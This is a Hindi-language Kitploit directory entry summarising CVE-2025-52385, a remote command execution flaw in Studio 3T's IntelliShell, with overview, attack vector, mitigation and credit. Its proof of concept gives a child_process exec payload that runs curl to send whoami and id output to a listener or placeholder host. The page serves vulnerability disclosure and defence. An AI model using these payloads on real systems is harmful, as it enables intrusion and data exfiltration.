Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-52385 — Studio 3T v.2025.1.0 | Kitploit
उपकरण/GitHubGitHub/kov404/cve-2025-52385
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubkov404/cve-2025-52385

CVE-2025-52385

Studio 3T v.2025.1.0

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-52385

सॉफ़्टवेयर: Studio 3T v.2025.1.0

भेद्यता रिपोर्ट: Studio 3T रिमोट कमांड निष्पादन

अवलोकन Studio 3T संस्करण 2025.1.0 और उससे पहले के संस्करणों में एक गंभीर भेद्यता एक दूरस्थ हमलावर को IntelliShell घटक में child_process मॉड्यूल का शोषण करने वाले एक क्राफ्टेड पेलोड के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

विवरण भेद्यता प्रकार: रिमोट कमांड निष्पादन प्रभावित उत्पाद: Studio 3T, संस्करण <= 2025.1.0 प्रभावित घटक: IntelliShell हमले का प्रकार: रिमोट प्रभाव: कोड निष्पादन: हाँ सेवा से वंचित करना: हाँ विशेषाधिकार वृद्धि: हाँ

वर्णन यह भेद्यता एक दूरस्थ हमलावर को child_process मॉड्यूल का लाभ उठाते हुए IntelliShell के माध्यम से एक दुर्भावनापूर्ण JavaScript पेलोड भेजकर मनमाना ऑपरेटिंग सिस्टम कमांड निष्पादित करने में सक्षम बनाती है। यह एक ब्लाइंड निष्पादन भेद्यता है, जिसका अर्थ है कि हमलावर को कोई सीधा आउटपुट वापस नहीं मिलता है।

हमले का वेक्टर

MongoDB इंस्टेंस से कनेक्शन स्थापित करें। child_process मॉड्यूल का उपयोग करने वाले एक दुर्भावनापूर्ण JavaScript पेलोड को IntelliShell के माध्यम से भेजें ताकि मनमाना ऑपरेटिंग सिस्टम कमांड निष्पादित किए जा सकें।

प्रूफ ऑफ कॉन्सेप्ट भेद्यता की पुष्टि करने के लिए, निम्नलिखित चरणों का उपयोग करें:

एक स्थानीय HTTP सर्वर सेट करें:python3 -m http.server 80

IntelliShell में निम्नलिखित JavaScript पेलोड निष्पादित करें: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));

वैकल्पिक रूप से, सत्यापन वेक्टर के रूप में नीचे दिए गए कमांड का उपयोग करें:curl http://site/$(id)

संदर्भ

Studio 3T आधिकारिक वेबसाइट

Studio 3T GitHub रिपॉजिटरी

CWE-78: OS कमांड इंजेक्शन

CWE-94: कोड इंजेक्शन

शमन उपयोगकर्ता: Studio 3T के पैच किए गए संस्करण में अपग्रेड करें (यदि उपलब्ध हो) या अविश्वसनीय MongoDB कनेक्शन के साथ IntelliShell का उपयोग करने से बचें। विक्रेता: अनधिकृत कमांड निष्पादन को रोकने के लिए IntelliShell में child_process मॉड्यूल के इनपुट को प्रतिबंधित या स्वच्छ करें।

आभार यह भेद्यता कैयो मेंडोंका पेरेरा द्वारा खोजी और रिपोर्ट की गई थी।

टूल डाउनलोड करें